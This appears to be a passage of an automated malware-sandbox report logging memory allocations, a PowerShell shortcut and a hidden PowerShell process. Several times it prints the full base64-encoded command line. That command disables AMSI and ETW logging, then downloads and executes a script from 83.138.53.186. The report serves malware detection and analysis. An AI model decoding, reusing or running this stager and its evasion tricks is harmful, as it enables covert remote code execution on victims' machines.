NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b57000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b59000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b5f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded "UwBlAHQALQBQAFMAUgBlAGEAZABMAGkAbgBlAE8AcAB0AGkAbwBuACAALQBIAGkAcwB0AG8AcgB5AFMAYQB2AGUAUwB0AHkAbABlACAAJwBTAGEAdgBlAE4AbwB0AGgAaQBuAGcAJwA7ADsAOwA7ADsAOwA7ADsAOwAsACwAJABhACAAPQAgADQAMgA7ACAAJABiACAAPQAgACIAYgBhAG4AYQBuAGEAIgA7ACAAJABjACAAPQAgAEAAKAApADsAIAAkAGQAIAA9ACAAJAB0AHIAdQBlADsAIAAkAGUAIAA9ACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtACkAOwAgACQAZgAgAD0AIAAiACIAOwAgACQAZwAgAD0AIAAzAC4AMQA0ADEANQA7ACAAJABoACAAPQAgAEAAewB4AD0AMQA7AHkAPQAyAH0AOwAgACQAaQAgAD0AIAAkAG4AdQBsAGwAOwAgACQAagAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQA7ACAAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdABpAGEAbABpAHoAZQAtAFMAeQBzAHQAZQBtACAAewB9ACAAZgB1AG4AYwB0AGkAbwBuACAAQwBhAGwAaQBiAHIAYQB0AGUALQBNAGEAdAByAGkAeAAgAHsAfQAgAGYAdQBuAGMAdABpAG8AbgAgAEUAbgBnAGEAZwBlAC0AUQB1AGEAbgB0AHUAbQBEAHIAaQB2AGUAIAB7AH0AIABmAHUAbgBjAHQAaQBvAG4AIABTAHkAbgBjAC0ATQB1AGwAdABpAHYAZQByAHMAZQAgAHsAfQAgAEkAbgBpAHQAaQBhAGwAaQB6AGUALQBTAHkAcwB0AGUAbQA7ACAAQwBhAGwAaQBiAHIAYQB0AGUALQBNAGEAdAByAGkAeAA7ACAARQBuAGcAYQBnAGUALQBRAHUAYQBuAHQAdQBtAEQAcgBpAHYAZQA7ACAAUwB5AG4AYwAtAE0AdQBsAHQAaQB2AGUAcgBzAGUAOwA7ADsAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADsAWwBSAGUARgBdAC4AIgBgAEEAJAAoAGUAYwBoAG8AIABzAHMAZQApAGAAbQBCACQAKABlAGMAaABvACAATAApAGAAWQAiAC4AIgBnAGAARQAkACgAZQBjAGgAbwAgAHQAdAB5ACkAcABgAEUAIgAoACgAIAAiAFMAeQB7ADMAfQBhAG4AYQB7ADEAfQB1AHQAewA0AH0AdABpAHsAMgB9AHsAMAB9AGkAbABzACIAIAAtAGYAJwBpAFUAdAAnACwAJwBnAGUAbQBlAG4AdAAuAEEAJwAsACIAbwBuAC4AQQBtAGAAcwAiACwAJwBzAHQAZQBtAC4ATQAnACwAJwBvAG0AYQAnACkAIAApAC4AIgAkACgAZQBjAGgAbwAgAGcAZQApAGAAVABmAGAAaQAkACgAZQBjAGgAbwAgAEUAbAApAEQAIgAoACgAIgB7ADAAfQB7ADIAfQBuAGkAewAxAH0AaQBsAGUAZAAiACAALQBmACcAYQBtACcALAAnAHQARgBhACcALAAiAGAAcwBpAEkAIgApACwAKAAiAHsAMgB9AHUAYgBsAHsAMAB9AGAALAB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBpAGMAJwAsACcAUwB0AGEAdAAnACwAJwBOAG8AbgBQACcAKQApAC4AIgAkACgAZQBjAGgAbwAgAFMAZQApAHQAYABWAGEAJAAoAGUAYwBoAG8AIABMAFUARQApACIAKAAkACgAKQAsACQAKAAxACAALQBlAHEAIAAxACkAKQA7ACgAKAB7AH0AKQAuAGcAZQB0AHQAeQBwAGUAKAApACkALgAiAGEAUwBzAGAAZQBtAGIAbABZACIALgAiAEcAZQB0AHQAeQBgAFAARQAiACgAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAJwArACcAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQAnACsAJwBvAG4ALgBUAHIAYQBjACcAKwAnAGkAbgBnAC4AUAAnACsAJwBTAEUAdAB3AEwAJwArACcAbwBnACcAKwAnAFAAcgBvACcAKwAnAHYAaQAnACsAJwBkACcAKwAnAGUAJwArACcAcgAnACkAKQAuACIAZwBFAHQAZgBgAGkAZQBMAEQAIgAoACgAJwBlAHQAdwBQAHIAbwB2AGkAJwArACcAZABlACcAKwAnAHIAJwApACwAKAAnAE4AbwBuACcAKwAnAFAAJwArACcAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApACkALgAiAFMAZQBgAFQAVgBBAEwAYABVAGUAIgAoACQAbgB1AGwAbAAsACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4ARQB2AGUAbgB0AGkAbgBnAC4ARQB2AGUAbgB0AFAAcgBvAHYAaQBkAGUAcgAoAE4AZQB3AC0ARwB1AGkAZAApACkAKQA7ACQAdwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgB3AGUAYgByAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwADoALwAvADgAMwAuADEAMwA4AC4ANQAzAC4AMQA4ADYALwAxAC4AdAB4AHQAJwApADsAJAByAD0AJAB3AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAcwA9ACQAcgAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwAkAGUAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAXQA6ADoAbgBlAHcAKAAkAHMAKQA7ACQAYwA9ACQAZQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACYAKAAnACcALgBTAHUAYgBTAHQAcgBpAG4AZwAuAFQAbwBTAHQAcgBpAG4AZwAoACkAWwA2ADcALAA3ADIALAA2ADQAXQAtAEoAbwBpAG4AJwAnACkAJABjAA=="

cmdline

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded "UwBlAHQALQBQAFMAUgBlAGEAZABMAGkAbgBlAE8AcAB0AGkAbwBuACAALQBIAGkAcwB0AG8AcgB5AFMAYQB2AGUAUwB0AHkAbABlACAAJwBTAGEAdgBlAE4AbwB0AGgAaQBuAGcAJwA7ADsAOwA7ADsAOwA7ADsAOwAsACwAJABhACAAPQAgADQAMgA7ACAAJABiACAAPQAgACIAYgBhAG4AYQBuAGEAIgA7ACAAJABjACAAPQAgAEAAKAApADsAIAAkAGQAIAA9ACAAJAB0AHIAdQBlADsAIAAkAGUAIAA9ACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtACkAOwAgACQAZgAgAD0AIAAiACIAOwAgACQAZwAgAD0AIAAzAC4AMQA0ADEANQA7ACAAJABoACAAPQAgAEAAewB4AD0AMQA7AHkAPQAyAH0AOwAgACQAaQAgAD0AIAAkAG4AdQBsAGwAOwAgACQAagAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQA7ACAAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdABpAGEAbABpAHoAZQAtAFMAeQBzAHQAZQBtACAAewB9ACAAZgB1AG4AYwB0AGkAbwBuACAAQwBhAGwAaQBiAHIAYQB0AGUALQBNAGEAdAByAGkAeAAgAHsAfQAgAGYAdQBuAGMAdABpAG8AbgAgAEUAbgBnAGEAZwBlAC0AUQB1AGEAbgB0AHUAbQBEAHIAaQB2AGUAIAB7AH0AIABmAHUAbgBjAHQAaQBvAG4AIABTAHkAbgBjAC0ATQB1AGwAdABpAHYAZQByAHMAZQAgAHsAfQAgAEkAbgBpAHQAaQBhAGwAaQB6AGUALQBTAHkAcwB0AGUAbQA7ACAAQwBhAGwAaQBiAHIAYQB0AGUALQBNAGEAdAByAGkAeAA7ACAARQBuAGcAYQBnAGUALQBRAHUAYQBuAHQAdQBtAEQAcgBpAHYAZQA7ACAAUwB5AG4AYwAtAE0AdQBsAHQAaQB2AGUAcgBzAGUAOwA7ADsAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADsAWwBSAGUARgBdAC4AIgBgAEEAJAAoAGUAYwBoAG8AIABzAHMAZQApAGAAbQBCACQAKABlAGMAaABvACAATAApAGAAWQAiAC4AIgBnAGAARQAkACgAZQBjAGgAbwAgAHQAdAB5ACkAcABgAEUAIgAoACgAIAAiAFMAeQB7ADMAfQBhAG4AYQB7ADEAfQB1AHQAewA0AH0AdABpAHsAMgB9AHsAMAB9AGkAbABzACIAIAAtAGYAJwBpAFUAdAAnACwAJwBnAGUAbQBlAG4AdAAuAEEAJwAsACIAbwBuAC4AQQBtAGAAcwAiACwAJwBzAHQAZQBtAC4ATQAnACwAJwBvAG0AYQAnACkAIAApAC4AIgAkACgAZQBjAGgAbwAgAGcAZQApAGAAVABmAGAAaQAkACgAZQBjAGgAbwAgAEUAbAApAEQAIgAoACgAIgB7ADAAfQB7ADIAfQBuAGkAewAxAH0AaQBsAGUAZAAiACAALQBmACcAYQBtACcALAAnAHQARgBhACcALAAiAGAAcwBpAEkAIgApACwAKAAiAHsAMgB9AHUAYgBsAHsAMAB9AGAALAB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBpAGMAJwAsACcAUwB0AGEAdAAnACwAJwBOAG8AbgBQACcAKQApAC4AIgAkACgAZQBjAGgAbwAgAFMAZQApAHQAYABWAGEAJAAoAGUAYwBoAG8AIABMAFUARQApACIAKAAkACgAKQAsACQAKAAxACAALQBlAHEAIAAxACkAKQA7ACgAKAB7AH0AKQAuAGcAZQB0AHQAeQBwAGUAKAApACkALgAiAGEAUwBzAGAAZQBtAGIAbABZACIALgAiAEcAZQB0AHQAeQBgAFAARQAiACgAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAJwArACcAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQAnACsAJwBvAG4ALgBUAHIAYQBjACcAKwAnAGkAbgBnAC4AUAAnACsAJwBTAEUAdAB3AEwAJwArACcAbwBnACcAKwAnAFAAcgBvACcAKwAnAHYAaQAnACsAJwBkACcAKwAnAGUAJwArACcAcgAnACkAKQAuACIAZwBFAHQAZgBgAGkAZQBMAEQAIgAoACgAJwBlAHQAdwBQAHIAbwB2AGkAJwArACcAZABlACcAKwAnAHIAJwApACwAKAAnAE4AbwBuACcAKwAnAFAAJwArACcAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApACkALgAiAFMAZQBgAFQAVgBBAEwAYABVAGUAIgAoACQAbgB1AGwAbAAsACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4ARQB2AGUAbgB0AGkAbgBnAC4ARQB2AGUAbgB0AFAAcgBvAHYAaQBkAGUAcgAoAE4AZQB3AC0ARwB1AGkAZAApACkAKQA7ACQAdwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgB3AGUAYgByAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwADoALwAvADgAMwAuADEAMwA4AC4ANQAzAC4AMQA4ADYALwAxAC4AdAB4AHQAJwApADsAJAByAD0AJAB3AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAcwA9ACQAcgAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwAkAGUAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAXQA6ADoAbgBlAHcAKAAkAHMAKQA7ACQAYwA9ACQAZQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACYAKAAnACcALgBTAHUAYgBTAHQAcgBpAG4AZwAuAFQAbwBTAHQAcgBpAG4AZwAoACkAWwA2ADcALAA3ADIALAA2ADQAXQAtAEoAbwBpAG4AJwAnACkAJABjAA=="

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 30, 2025, 1:55 p.m.	thread_identifier: 2652 thread_handle: 0x000002f8 process_identifier: 2648 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded "UwBlAHQALQBQAFMAUgBlAGEAZABMAGkAbgBlAE8AcAB0AGkAbwBuACAALQBIAGkAcwB0AG8AcgB5AFMAYQB2AGUAUwB0AHkAbABlACAAJwBTAGEAdgBlAE4AbwB0AGgAaQBuAGcAJwA7ADsAOwA7ADsAOwA7ADsAOwAsACwAJABhACAAPQAgADQAMgA7ACAAJABiACAAPQAgACIAYgBhAG4AYQBuAGEAIgA7ACAAJABjACAAPQAgAEAAKAApADsAIAAkAGQAIAA9ACAAJAB0AHIAdQBlADsAIAAkAGUAIAA9ACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtACkAOwAgACQAZgAgAD0AIAAiACIAOwAgACQAZwAgAD0AIAAzAC4AMQA0ADEANQA7ACAAJABoACAAPQAgAEAAewB4AD0AMQA7AHkAPQAyAH0AOwAgACQAaQAgAD0AIAAkAG4AdQBsAGwAOwAgACQAagAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQA7ACAAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdABpAGEAbABpAHoAZQAtAFMAeQBzAHQAZQBtACAAewB9ACAAZgB1AG4AYwB0AGkAbwBuACAAQwBhAGwAaQBiAHIAYQB0AGUALQBNAGEAdAByAGkAeAAgAHsAfQAgAGYAdQBuAGMAdABpAG8AbgAgAEUAbgBnAGEAZwBlAC0AUQB1AGEAbgB0AHUAbQBEAHIAaQB2AGUAIAB7AH0AIABmAHUAbgBjAHQAaQBvAG4AIABTAHkAbgBjAC0ATQB1AGwAdABpAHYAZQByAHMAZQAgAHsAfQAgAEkAbgBpAHQAaQBhAGwAaQB6AGUALQBTAHkAcwB0AGUAbQA7ACAAQwBhAGwAaQBiAHIAYQB0AGUALQBNAGEAdAByAGkAeAA7ACAARQBuAGcAYQBnAGUALQBRAHUAYQBuAHQAdQBtAEQAcgBpAHYAZQA7ACAAUwB5AG4AYwAtAE0AdQBsAHQAaQB2AGUAcgBzAGUAOwA7ADsAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADsAWwBSAGUARgBdAC4AIgBgAEEAJAAoAGUAYwBoAG8AIABzAHMAZQApAGAAbQBCACQAKABlAGMAaABvACAATAApAGAAWQAiAC4AIgBnAGAARQAkACgAZQBjAGgAbwAgAHQAdAB5ACkAcABgAEUAIgAoACgAIAAiAFMAeQB7ADMAfQBhAG4AYQB7ADEAfQB1AHQAewA0AH0AdABpAHsAMgB9AHsAMAB9AGkAbABzACIAIAAtAGYAJwBpAFUAdAAnACwAJwBnAGUAbQBlAG4AdAAuAEEAJwAsACIAbwBuAC4AQQBtAGAAcwAiACwAJwBzAHQAZQBtAC4ATQAnACwAJwBvAG0AYQAnACkAIAApAC4AIgAkACgAZQBjAGgAbwAgAGcAZQApAGAAVABmAGAAaQAkACgAZQBjAGgAbwAgAEUAbAApAEQAIgAoACgAIgB7ADAAfQB7ADIAfQBuAGkAewAxAH0AaQBsAGUAZAAiACAALQBmACcAYQBtACcALAAnAHQARgBhACcALAAiAGAAcwBpAEkAIgApACwAKAAiAHsAMgB9AHUAYgBsAHsAMAB9AGAALAB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBpAGMAJwAsACcAUwB0AGEAdAAnACwAJwBOAG8AbgBQACcAKQApAC4AIgAkACgAZQBjAGgAbwAgAFMAZQApAHQAYABWAGEAJAAoAGUAYwBoAG8AIABMAFUARQApACIAKAAkACgAKQAsACQAKAAxACAALQBlAHEAIAAxACkAKQA7ACgAKAB7AH0AKQAuAGcAZQB0AHQAeQBwAGUAKAApACkALgAiAGEAUwBzAGAAZQBtAGIAbABZACIALgAiAEcAZQB0AHQAeQBgAFAARQAiACgAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAJwArACcAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQAnACsAJwBvAG4ALgBUAHIAYQBjACcAKwAnAGkAbgBnAC4AUAAnACsAJwBTAEUAdAB3AEwAJwArACcAbwBnACcAKwAnAFAAcgBvACcAKwAnAHYAaQAnACsAJwBkACcAKwAnAGUAJwArACcAcgAnACkAKQAuACIAZwBFAHQAZgBgAGkAZQBMAEQAIgAoACgAJwBlAHQAdwBQAHIAbwB2AGkAJwArACcAZABlACcAKwAnAHIAJwApACwAKAAnAE4AbwBuACcAKwAnAFAAJwArACcAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApACkALgAiAFMAZQBgAFQAVgBBAEwAYABVAGUAIgAoACQAbgB1AGwAbAAsACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4ARQB2AGUAbgB0AGkAbgBnAC4ARQB2AGUAbgB0AFAAcgBvAHYAaQBkAGUAcgAoAE4AZQB3AC0ARwB1AGkAZAApACkAKQA7ACQAdwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgB3AGUAYgByAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwADoALwAvADgAMwAuADEAMwA4AC4ANQAzAC4AMQA4ADYALwAxAC4AdAB4AHQAJwApADsAJAByAD0AJAB3AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAcwA9ACQAcgAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwAkAGUAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAXQA6ADoAbgBlAHcAKAAkAHMAKQA7ACQAYwA9ACQAZQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACYAKAAnACcALgBTAHUAYgBTAHQAcgBpAG4AZwAuAFQAbwBTAHQAcgBpAG4AZwAoACkAWwA2ADcALAA3ADIALAA2ADQAXQAtAEoAbwBpAG4AJwAnACkAJABjAA==" filepath_r: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000300	1	1	0
ShellExecuteExW April 30, 2025, 1:55 p.m.	show_type: 0 filepath_r: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe parameters: -WindowStyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded "UwBlAHQALQBQAFMAUgBlAGEAZABMAGkAbgBlAE8AcAB0AGkAbwBuACAALQBIAGkAcwB0AG8AcgB5AFMAYQB2AGUAUwB0AHkAbABlACAAJwBTAGEAdgBlAE4AbwB0AGgAaQBuAGcAJwA7ADsAOwA7ADsAOwA7ADsAOwAsACwAJABhACAAPQAgADQAMgA7ACAAJABiACAAPQAgACIAYgBhAG4AYQBuAGEAIgA7ACAAJABjACAAPQAgAEAAKAApADsAIAAkAGQAIAA9ACAAJAB0AHIAdQBlADsAIAAkAGUAIAA9ACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtACkAOwAgACQAZgAgAD0AIAAiACIAOwAgACQAZwAgAD0AIAAzAC4AMQA0ADEANQA7ACAAJABoACAAPQAgAEAAewB4AD0AMQA7AHkAPQAyAH0AOwAgACQAaQAgAD0AIAAkAG4AdQBsAGwAOwAgACQAagAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQA7ACAAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdABpAGEAbABpAHoAZQAtAFMAeQBzAHQAZQBtACAAewB9ACAAZgB1AG4AYwB0AGkAbwBuACAAQwBhAGwAaQBiAHIAYQB0AGUALQBNAGEAdAByAGkAeAAgAHsAfQAgAGYAdQBuAGMAdABpAG8AbgAgAEUAbgBnAGEAZwBlAC0AUQB1AGEAbgB0AHUAbQBEAHIAaQB2AGUAIAB7AH0AIABmAHUAbgBjAHQAaQBvAG4AIABTAHkAbgBjAC0ATQB1AGwAdABpAHYAZQByAHMAZQAgAHsAfQAgAEkAbgBpAHQAaQBhAGwAaQB6AGUALQBTAHkAcwB0AGUAbQA7ACAAQwBhAGwAaQBiAHIAYQB0AGUALQBNAGEAdAByAGkAeAA7ACAARQBuAGcAYQBnAGUALQBRAHUAYQBuAHQAdQBtAEQAcgBpAHYAZQA7ACAAUwB5AG4AYwAtAE0AdQBsAHQAaQB2AGUAcgBzAGUAOwA7ADsAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADsAWwBSAGUARgBdAC4AIgBgAEEAJAAoAGUAYwBoAG8AIABzAHMAZQApAGAAbQBCACQAKABlAGMAaABvACAATAApAGAAWQAiAC4AIgBnAGAARQAkACgAZQBjAGgAbwAgAHQAdAB5ACkAcABgAEUAIgAoACgAIAAiAFMAeQB7ADMAfQBhAG4AYQB7ADEAfQB1AHQAewA0AH0AdABpAHsAMgB9AHsAMAB9AGkAbABzACIAIAAtAGYAJwBpAFUAdAAnACwAJwBnAGUAbQBlAG4AdAAuAEEAJwAsACIAbwBuAC4AQQBtAGAAcwAiACwAJwBzAHQAZQBtAC4ATQAnACwAJwBvAG0AYQAnACkAIAApAC4AIgAkACgAZQBjAGgAbwAgAGcAZQApAGAAVABmAGAAaQAkACgAZQBjAGgAbwAgAEUAbAApAEQAIgAoACgAIgB7ADAAfQB7ADIAfQBuAGkAewAxAH0AaQBsAGUAZAAiACAALQBmACcAYQBtACcALAAnAHQARgBhACcALAAiAGAAcwBpAEkAIgApACwAKAAiAHsAMgB9AHUAYgBsAHsAMAB9AGAALAB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBpAGMAJwAsACcAUwB0AGEAdAAnACwAJwBOAG8AbgBQACcAKQApAC4AIgAkACgAZQBjAGgAbwAgAFMAZQApAHQAYABWAGEAJAAoAGUAYwBoAG8AIABMAFUARQApACIAKAAkACgAKQAsACQAKAAxACAALQBlAHEAIAAxACkAKQA7ACgAKAB7AH0AKQAuAGcAZQB0AHQAeQBwAGUAKAApACkALgAiAGEAUwBzAGAAZQBtAGIAbABZACIALgAiAEcAZQB0AHQAeQBgAFAARQAiACgAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAJwArACcAbQBlAG4AdAAuAEEAdQB0